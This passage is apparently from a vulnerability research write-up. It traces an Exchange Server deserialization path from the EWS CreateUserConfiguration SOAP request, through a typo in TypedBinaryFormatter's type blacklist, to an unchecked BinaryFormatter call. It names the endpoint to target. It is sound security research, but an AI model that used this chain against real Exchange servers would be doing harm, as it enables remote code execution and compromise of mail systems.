System.Security.Claims.ClaimsPrincipal \n using System.Runtime.Serialization; \n \n [OnDeserialized] \n [SecurityCritical] \n private void OnDeserializedMethod(StreamingContext context) \n { \n \u00a0\u00a0\u00a0\u00a0if (!(this is ISerializable)) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0DeserializeIdentities(m_serializedClaimsIdentities); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0m_serializedClaimsIdentities = null; \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nBut where is `m_serializedClaimsIdentities` set? Well looking at the `OnSerializedMethod()` function we can see this is set when serializing the object, as explained at <https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.ondeserializingattribute?view=net-6.0> in the code examples and as shown below:\n \n \n // System.Security.Claims.ClaimsPrincipal \n using System.Runtime.Serialization; \n \n [OnSerializing] \n [SecurityCritical] \n private void OnSerializingMethod(StreamingContext context) \n { \n \u00a0\u00a0\u00a0\u00a0if (!(this is ISerializable)) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0m_serializedClaimsIdentities = SerializeIdentities(); \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nAlright so now we know how that is set, lets go back to the deserialization shall we? The code for `DeserializeIdentities()` can be seen below. Note that there is a call to `binaryFormatter.Deserialize(serializationStream2, null, fCheck: false);` in this code. `binaryFormatter.Deserialize()` is equivalent to `BinaryFormatter.Deserialize()`, which doesn\u2019t bind a checker to check what types are being deserialized, so this method is easily exploitable if no checks or incorrect checks are being done on the types being deserialized. This is the case here due to the incorrect implementation of the type blacklist.\n \n \n // System.Security.Claims.ClaimsPrincipal \n using System.Collections.Generic; \n using System.Globalization; \n using System.IO; \n using System.Runtime.Serialization; \n using System.Runtime.Serialization.Formatters.Binary; \n using System.Security.Principal; \n \n [SecurityCritical] \n private void DeserializeIdentities(string identities) \n { \n \u00a0\u00a0\u00a0\u00a0m_identities = new List<ClaimsIdentity>(); \n \u00a0\u00a0\u00a0\u00a0if (string.IsNullOrEmpty(identities)) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return; \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0List<string> list = null; \n \u00a0\u00a0\u00a0\u00a0BinaryFormatter binaryFormatter = new BinaryFormatter(); \n \u00a0\u00a0\u00a0\u00a0using MemoryStream serializationStream = new MemoryStream(Convert.FromBase64String(identities)); \n \u00a0\u00a0\u00a0\u00a0list = (List<string>)binaryFormatter.Deserialize(serializationStream, null, fCheck: false); \n \u00a0\u00a0\u00a0\u00a0for (int i = 0; i < list.Count; i += 2) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ClaimsIdentity claimsIdentity = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0using (MemoryStream serializationStream2 = new MemoryStream(Convert.FromBase64String(list[i + 1]))) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0claimsIdentity = (ClaimsIdentity)binaryFormatter.Deserialize(serializationStream2, null, fCheck: false); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!string.IsNullOrEmpty(list[i])) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!long.TryParse(list[i], NumberStyles.Integer, NumberFormatInfo.InvariantInfo, out var result)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new SerializationException(Environment.GetResourceString(\"Serialization_CorruptedStream\")); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0claimsIdentity = new WindowsIdentity(claimsIdentity, new IntPtr(result)); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0m_identities.Add(claimsIdentity); \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nSo from this we can confirm that the chain for deserialization looks like this:\n \n \n System.Security.Claims.ClaimsPrincipal.OnDeserializedMethod() \n System.Security.Claims.ClaimsPrincipal.DeserializeIdentities() \n BinaryFormatter.Deserialize()\n \n\n# Quick review\n\n## TLDR\n\nWe now have a type, `TypedBinaryFormatter` that has a binder who incorrectly validates the types that `TypedBinaryFormatter` deserializes and which allows the `Security.Systems.Claims.ClaimsPrincipal` to go through which allows for arbitrary type deserialization.\n\n## Longer explanation\n\nAlright so lets quickly review what we know. We know we need to deserialize a `TypedBinaryFormatter` object whose `Deserialize()` method will result in a `ExchangeBinaryFormatterFactory.CreateBinaryFormatter()` call. This results in a new `ChainedSerializationBinder` class object being created whose `BindToType()` method that is used to validate the data that `TypedBinaryFormatter` will deserialize. `BindToType()` will call `ValidateTypeToDeserialize()` within the same class. This uses a blacklist in the variable `GlobalDisallowedTypesForDeserialization` which is set to the result of calling `ChainedSerializationBinder`\u2019s `BuildDisallowedTypesForDeserialization()` method. Unfortunately this method had a typo so the `Security.System.Claims.ClaimsPrincipal` type was allowed though.\n\nIf we then deserialize an object of type `Security.System.Claims.ClaimsPrincipal` we can get it to hit a vulnerable `BinaryFormatter.Deserialize()` call via the call chain, which can deserialize arbitrary classes as this type of formatter doesn\u2019t use a binder to check what types it deserializes.\n \n \n TypedBinaryFormatter.DeserializeObject(Stream, TypeBinder)\n \tTypedBinaryFormatter.Desearialize(Stream)\n \t\tSystem.Security.Claims.ClaimsPrincipal.OnDeserializedMethod() \n \t\t System.Security.Claims.ClaimsPrincipal.DeserializeIdentities() \n \t\t BinaryFormatter.Deserialize()\n \n\n# The Source\n\n## Initial Inspection\n\nLets start at `Microsoft.Exchange.Compliance.Serialization.Formatters.TypedBinaryFormatter.Deserialize(Stream, SerializationBinder)` and work back. We start with this one as its the most common use case. If we look at the other remaining 3 function definition variations for the `Deserialize()` method, we will see that two of them have no callers, and the remaining one is a little more complex (I imagine its still viable but no need to complicate the beast when there are simpler ways!)\n\n![[Pasted image 20220205174401.png]]\n\nAs is shown above we can see that `Microsoft.Exchange.Compliance.Serialization.Formatters.TypedBinaryFormatter.Deserialize(Stream, SerializationBinder)` is called by `Microsoft.Exchange.Compliance.Serialization.Formatters.TypedBinaryFormatter.DeserializeObject(Stream, TypeBinder)`, which is turn called by `Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)`.\n\nSo deserialization chain is now:\n \n \n Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)\n \tTypedBinaryFormatter.DeserializeObject(Stream, TypeBinder)\n \t\tTypedBinaryFormatter.Desearialize(Stream)\n \t\t\tSystem.Security.Claims.ClaimsPrincipal.OnDeserializedMethod() \n \t\t\t System.Security.Claims.ClaimsPrincipal.DeserializeIdentities() \n \t\t\t BinaryFormatter.Deserialize()\n \n\n## ILSpy And Interfaces \u2013 Finding Where Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream) is Used\n\nAt this point we hit a snag, as it seems like this isn\u2019t called anywhere. However in [[ILSpy]] and we see we can see an `Implements` field that does not appear in [[dnSpy]] and if we expand this we can see that it has a `Implemented By` and `Used By` field.\n\nWe can see that `Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)` implements `Microsoft.Exchange.Data.ApplicationLogic.Extension.IClientExtensionCollectionFormatter.Deserialize` (note the `IClient` not `Client` part here indicating that this is an interface, not a normal class), and that this interface is used by `Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration userConfiguration, out OrgExtensionRetrievalResult result, out Exception exception)`, which will use this interface to call the `Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)` function.\n\n![[Pasted image 20220207195041.png]]\n\nWe can also verify that `Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer` is essentially just an interface wrapper around the `ClientExtensionCollectionFormatter` interface:\n \n \n // Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer \n private IClientExtensionCollectionFormatter formatter;\n \n\nSo deserialization chain is now:\n \n \n Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration, out OrgExtensionRetrievalResult, out Exception)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)\n \t\tTypedBinaryFormatter.DeserializeObject(Stream, TypeBinder)\n \t\t\tTypedBinaryFormatter.Desearialize(Stream)\n \t\t\t\tSystem.Security.Claims.ClaimsPrincipal.OnDeserializedMethod() \n \t\t\t\t System.Security.Claims.ClaimsPrincipal.DeserializeIdentities() \n \t\t\t\t BinaryFormatter.Deserialize()\n \n\n## Finding the Expected Data Types for Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize\n\nThe code for `Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration userConfiguration, out OrgExtensionRetrievalResult result, out Exception exception)` can be seen below:\n \n \n // Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer \n using System; \n using System.Collections; \n using System.IO; \n using System.Runtime.Serialization; \n using Microsoft.Exchange.Data.Storage; \n \n public bool TryDeserialize(IUserConfiguration userConfiguration, out OrgExtensionRetrievalResult result, out Exception exception) \n { \n \u00a0\u00a0\u00a0\u00a0result = new OrgExtensionRetrievalResult(); \n \u00a0\u00a0\u00a0\u00a0exception = null; \n \u00a0\u00a0\u00a0\u00a0IDictionary dictionary = userConfiguration.GetDictionary(); \n \u00a0\u00a0\u00a0\u00a0if (dictionary.Contains(\"OrgDO\")) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0result.HasDefaultExtensionsWithDefaultStatesOnly = (bool)dictionary[\"OrgDO\"]; \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0bool flag = false; \n \u00a0\u00a0\u00a0\u00a0if (!result.HasDefaultExtensionsWithDefaultStatesOnly) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0using (Stream stream = userConfiguration.GetStream()) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0stream.Position = 0L; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0result.Extensions = formatter.Deserialize(stream); <- DESERIALIZATION HERE\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return true; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (SerializationException ex) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Tracer.TraceError(GetHashCode(), \"deserialization failed with {0}\", ex); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0flag = false; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exception = ex; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return flag; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0return true; \n }\n \n\nLooking at the code here we can see that we appear to be deserializing a `stream` variable of type `Stream`, which is set to the result of calling `userConfiguration.GetStream()`. Further up in the code we can see `userConfiguration` is defined as an interface to the `UserConfiguration` class via the line `IUserConfiguration userConfiguration` in the parameter list. We can find more details on this class at <https://docs.microsoft.com/en-us/dotnet/api/microsoft.exchange.webservices.data.userconfiguration?view=exchange-ews-api> which mentions this is part of the Exchange EWS API.\n\nFurther Googling for `UserConfiguration` turns up <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/userconfiguration> which references it as a EWS XML element that defines a single user configuration object with the following format:\n \n \n <UserConfiguration> \n \t<UserConfigurationName/> \n \t<ItemId/> \n \t<Dictionary/> \n \t<XmlData/> \n \t<BinaryData/> \n </UserConfiguration>\n \n\nWe also see there is a parent object called `CreateUserConfiguration`. Documentation for this object can be found at <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/createuserconfiguration> where it is defined as follows:\n \n \n <CreateUserConfiguration>\n <UserConfiguration/>\n </CreateUserConfiguration>\n \n\nOkay so this is great and all, but this leaves two questions. The first question is \u201cHow do we actually use this data in a web request?\u201d and the second question is \u201cWhat is this data used for normally?\u201d. Further Googling of `CreateUserConfiguration` answers the second question when we find <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/createuserconfiguration-operation> which mentions that `The CreateUserConfiguration operation creates a user configuration object on a folder.` This also provides some data examples on how this might be used as a SOAP request. However it doesn\u2019t specify what endpoint we would have to send this to, leading to another open question. A second open question then becomes \u201cOkay I suppose I might want to debug this later on in the code when developing the exploit, but where is it implemented?\u201d. Lets answer that second question now.\n\n## Identifying CreateUserConfiguration Code\n\nAs it turns out, finding the code that handles `CreateUserConfiguration` takes us down a bit of a winding path. We start with `Microsoft.Exchange.Data.Storage.IUserConfiguration` as the definition of the interface we saw earlier in the `Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration userConfiguration, out OrgExtensionRetrievalResult result, out Exception exception)` function definition.\n\nHowever once again we quickly realize that `IUserConfiguration` is just an interface class. Searching for `UserConfiguration` with the `Type` filter on eventually leads us to find the `Microsoft.Exchange.Data.Storage.UserConfiguration` type:\n\n![[Pasted image 20220207203836.png]]\n\nLooking inside this leads us to find `Microsoft.Exchange.Data.Storage.UserConfiguration.GetConfiguration`.\n \n \n // Microsoft.Exchange.Data.Storage.UserConfiguration \n using Microsoft.Exchange.Diagnostics; \n using Microsoft.Exchange.Diagnostics.Components.Data.Storage; \n using Microsoft.Exchange.ExchangeSystem; \n \n public static UserConfiguration GetConfiguration(Folder folder, UserConfigurationName configurationName, UserConfigurationTypes type, bool autoCreate) \n { \n \u00a0\u00a0\u00a0\u00a0EnumValidator.ThrowIfInvalid(type, \"type\"); \n \u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return GetIgnoringCache(null, folder, configurationName, type); \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0catch (ObjectNotFoundException arg) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (ExTraceGlobals.StorageTracer.IsTraceEnabled(TraceType.ErrorTrace)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExTraceGlobals.StorageTracer.TraceError(0L, \"UserConfiguration::GetConfiguration. User Configuration object not found. Exception = {0}.\", arg); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0if (autoCreate) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return Create(folder, configurationName, type); \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0return null; \n }\n \n\nAt this point, I knew that there has to be some way to create the user configuration object given the error message and wondered if there was a similarly named `CreateUserConfiguration` function, going off of the naming convention that seemed to be used for these functions. I searched for this and it turns out there was a function under `Microsoft.Exchange.Services.Core.CreateUserConfiguration` named `CreateUserConfiguration()`.\n\n![[Pasted image 20220207204246.png]]\n\nLets look at its code:\n \n \n // Microsoft.Exchange.Services.Core.CreateUserConfiguration \n using Microsoft.Exchange.Services.Core.Types; \n \n public CreateUserConfiguration(ICallContext callContext, CreateUserConfigurationRequest request) : base(callContext, request) \n { \n \u00a0\u00a0\u00a0\u00a0serviceUserConfiguration = request.UserConfiguration; \n \u00a0\u00a0\u00a0\u00a0ServiceCommandBase<ICallContext>.ThrowIfNull(serviceUserConfiguration, \"serviceUserConfiguration\", \"CreateUserConfiguration::ctor\"); \n }\n \n\nAlright so this seems to take in some request object from a HTTP request or similar, and then set the `serviceUserConfiguration` variable to the section in the request named `UserConfiguration` with `request.UserConfiguration`. We seem to be on the right track, so lets look at the `Microsoft.Exchange.Services.Core.Types.CreateUserConfigurationRequest` type of the `request` variable:\n \n \n // Microsoft.Exchange.Services.Core.Types.CreateUserConfigurationRequest \n using System.Runtime.Serialization; \n using System.Xml.Serialization; \n using Microsoft.Exchange.Services; \n using Microsoft.Exchange.Services.Core; \n using Microsoft.Exchange.Services.Core.Types; \n \n [XmlType(\"CreateUserConfigurationRequestType\", Namespace = \"http://schemas.microsoft.com/exchange/services/2006/messages\")] \n [DataContract(Namespace = \"http://schemas.datacontract.org/2004/07/Exchange\")] \n public class CreateUserConfigurationRequest : BaseRequest \n { \n \u00a0\u00a0\u00a0\u00a0[XmlElement] \n \u00a0\u00a0\u00a0\u00a0[DataMember(IsRequired = true)] \n \u00a0\u00a0\u00a0\u00a0public ServiceUserConfiguration UserConfiguration { get; set; } \n \n \u00a0\u00a0\u00a0\u00a0internal override IServiceCommand GetServiceCommand(ICallContext callContext) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new CreateUserConfiguration(callContext, this); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override BaseServerIdInfo GetProxyInfo(IMinimalCallContext callContext) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (UserConfiguration == null || UserConfiguration.UserConfigurationName == null || UserConfiguration.UserConfigurationName.BaseFolderId == null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return BaseServerIdInfoFactory.GetServerInfoForFolderId(callContext, UserConfiguration.UserConfigurationName.BaseFolderId); \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nHere we can see that `UserConfiguration` is of type `Microsoft.Exchange.Services.Core.Types.ServiceUserConfiguration` so lets check out that definition:\n \n \n // Microsoft.Exchange.Services.Core.Types.ServiceUserConfiguration \n using System; \n using System.Runtime.Serialization; \n using System.Xml.Serialization; \n using Microsoft.Exchange.Services.Core.Types; \n \n [Serializable] \n [XmlType(TypeName = \"UserConfigurationType\", Namespace = \"http://schemas.microsoft.com/exchange/services/2006/types\")] \n [DataContract(Namespace = \"http://schemas.datacontract.org/2004/07/Exchange\")] \n public class ServiceUserConfiguration \n { \n \u00a0\u00a0\u00a0\u00a0[XmlElement(\"UserConfigurationName\")] \n \u00a0\u00a0\u00a0\u00a0[DataMember(IsRequired = true, Order = 1)] \n \u00a0\u00a0\u00a0\u00a0public UserConfigurationNameType UserConfigurationName { get; set; } \n \n \u00a0\u00a0\u00a0\u00a0[XmlElement(\"ItemId\")] \n \u00a0\u00a0\u00a0\u00a0[DataMember(Name = \"ItemId\", IsRequired = false, EmitDefaultValue = false, Order = 2)] \n \u00a0\u00a0\u00a0\u00a0public ItemId ItemId { get; set; } \n \n \u00a0\u00a0\u00a0\u00a0[XmlArrayItem(\"DictionaryEntry\", IsNullable = false)] \n \u00a0\u00a0\u00a0\u00a0[DataMember(Name = \"Dictionary\", IsRequired = false, EmitDefaultValue = false, Order = 3)] \n \u00a0\u00a0\u00a0\u00a0public UserConfigurationDictionaryEntry[] Dictionary { get; set; } \n \n \u00a0\u00a0\u00a0\u00a0[XmlElement] \n \u00a0\u00a0\u00a0\u00a0[DataMember(Name = \"XmlData\", IsRequired = false, EmitDefaultValue = false, Order = 4)] \n \u00a0\u00a0\u00a0\u00a0public string XmlData { get; set; } \n \n \u00a0\u00a0\u00a0\u00a0[DataMember(Name = \"BinaryData\", IsRequired = false, EmitDefaultValue = false, Order = 5)] \n \u00a0\u00a0\u00a0\u00a0public string BinaryData { get; set; } \n }\n \n\nAnd this matches what we saw earlier! Perfect! But one last thing. We saw the example on the web used SOAP, so lets see if we can find a function related to SOAP that handles this function. Expanding this search to `Types and Methods` and searching for `CreateUserConfigurationSoap`, we see that `CreateUserConfigurationSoapRequest` exists as a type, as well as `CreateUserConfigurationSoapResponse`.\n\n![[Pasted image 20220207211116.png]]\n\nLets look at the request definition:\n \n \n // Microsoft.Exchange.Services.Wcf.CreateUserConfigurationSoapRequest \n using System.ServiceModel; \n using Microsoft.Exchange.Services.Core.Types; \n using Microsoft.Exchange.Services.Wcf; \n \n [MessageContract(IsWrapped = false)] \n public class CreateUserConfigurationSoapRequest : BaseSoapRequest \n { \n \u00a0\u00a0\u00a0\u00a0[MessageBodyMember(Name = \"CreateUserConfiguration\", Namespace = \"http://schemas.microsoft.com/exchange/services/2006/messages\", Order = 0)] \n \u00a0\u00a0\u00a0\u00a0public CreateUserConfigurationRequest Body; \n }\n \n\nAlright lets see where that is used.\n\n![[Pasted image 20220207211256.png]]\n\nLooks like `BeginCreateUserConfiguration(CreateUserConfigurationSoapRequest soapRequest, AsyncCallback asyncCallback, object asyncState)` uses this.\n \n \n // Microsoft.Exchange.Services.Wcf.EWSService \n using System; \n using Microsoft.Exchange.Services.Core.Types; \n \n [PublicEWSVersion] \n public IAsyncResult BeginCreateUserConfiguration(CreateUserConfigurationSoapRequest soapRequest, AsyncCallback asyncCallback, object asyncState) \n { \n \u00a0\u00a0\u00a0\u00a0return soapRequest.Body.ValidateAndSubmit<CreateUserConfigurationResponse>(CallContext.Current, asyncCallback, asyncState); \n }\n \n\nAlright so now we know where to debug but what is the URL we need? Well we can see this is within the `EWSService` class, so lets see if we can\u2019t find a bit of documentation about EWS to help guide us.\n\nA bit of digging turns up <https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/get-started-with-ews-client-applications> which mentions that the normal URL is at `/EWS/Exchange.asmx`. However the page also notes that using the AutoDiscover service which is at `https://<domain>/autodiscover/autodiscover.svc`, `https://<domain>/autodiscover/autodiscover.xml`, `https://autodiscover.<domain>/autodiscover/autodiscover.xml`, or `https://autodiscover.<domain>/autodiscover/autodiscover.svc` is meant to be the more appropriate way to do things, however in my experience I haven\u2019t found these to contain any info r.e the proper URL to use. Maybe I\u2019ll be corrected but for now we\u2019ll go off the assumption that `/EWS/Exchange.asmx` is the proper URL.\n\n## Entry Point Review\n\nWanted to hit `Microsoft.Exchange.Compliance.Serialization.Formatters.TypedBinaryFormatter.Deserialize(Stream, SerializationBinder)` and after tracing this back we found that ultimately this is called via `Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration userConfiguration, out OrgExtensionRetrievalResult result, out Exception exception)` which will use the `Deserialize` method of `Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)` to do the actual deserialization on the `userConfiguration.GetStream()` parameter passed in.\n\nWe then found that the expected format of the `UserConfiguration` class that `userConfiguration` is an instance of looks like the following snippet:\n \n \n <CreateUserConfiguration>\n <UserConfiguration/>\n </CreateUserConfiguration>\n \n\nWhere `UserConfiguration` looks like\n \n \n <UserConfiguration> \n \t<UserConfigurationName/> \n \t<ItemId/> \n \t<Dictionary/> \n \t<XmlData/> \n \t<BinaryData/> \n </UserConfiguration>\n \n\nThis lead us to `Microsoft.Exchange.Services.Core.Types.CreateUserConfigurationRequest` and later to `Microsoft.Exchange.Services.Core.Types.ServiceUserConfiguration` which confirmed we were processing the right data.\n\nWe then confirmed that `Microsoft.Exchange.Services.Wcf.CreateUserConfigurationSoapRequest` is where SOAP requests to create the user configuration are handled and that `Microsoft.Exchange.Services.Wcf.EWSService.BeginCreateUserConfiguration(CreateUserConfigurationSoapRequest soapRequest, AsyncCallback asyncCallback, object asyncState)` uses this to call `soapRequest.Body.ValidateAndSubmit<CreateUserConfigurationResponse>(CallContext.Current, asyncCallback, asyncState);` which will asynchronously create the user configuration and then return a `CreateUserConfigurationResponse` instance containing the response to send back.\n\nFinally we determined `https://<domain>/EWS/Exchange.asmx` is where we need to send our POST request to hopefully create the `UserConfiguration` object.\n\nAll of this results in the following chain for the deserialization attack at the moment.\n \n \n Microsoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration, out OrgExtensionRetrievalResult, out Exception)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)\n \t\tTypedBinaryFormatter.DeserializeObject(Stream, TypeBinder)\n \t\t\tTypedBinaryFormatter.Desearialize(Stream)\n \t\t\t\tSystem.Security.Claims.ClaimsPrincipal.OnDeserializedMethod() \n \t\t\t\t System.Security.Claims.ClaimsPrincipal.DeserializeIdentities() \n \t\t\t\t BinaryFormatter.Deserialize()\n \n\n# Creating a ServiceUserConfiguration Object With BinaryData Stream\n\nNow that we have the URL to send the payload to we just need to figure out which field of the `ServiceUserConfiguration` object to set and how this should be done. Looking back at `Microsoft.Exchange.Services.Core.CreateUserConfiguration` code we can see the `Execute()` method calls the `CreateInstance()` method before setting the returned `UserConfiguration` object\u2019s properties using `SetProperties()`.\n \n \n // Microsoft.Exchange.Services.Core.CreateUserConfiguration \n using Microsoft.Exchange.Data.Storage; \n using Microsoft.Exchange.Diagnostics.Components.Services; \n using Microsoft.Exchange.Services; \n using Microsoft.Exchange.Services.Core; \n using Microsoft.Exchange.Services.Core.Types; \n \n internal sealed class CreateUserConfiguration : UserConfigurationCommandBase<CreateUserConfigurationRequest, ServiceResultNone> \n { \n \u00a0\u00a0\u00a0\u00a0private ServiceUserConfiguration serviceUserConfiguration; \n \n \u00a0\u00a0\u00a0\u00a0public CreateUserConfiguration(ICallContext callContext, CreateUserConfigurationRequest request) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0: base(callContext, request) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0serviceUserConfiguration = request.UserConfiguration; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ServiceCommandBase<ICallContext>.ThrowIfNull(serviceUserConfiguration, \"serviceUserConfiguration\", \"CreateUserConfiguration::ctor\"); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0internal override IExchangeWebMethodResponse GetResponse() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new CreateUserConfigurationResponse \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ResponseMessages =\u00a0 \n 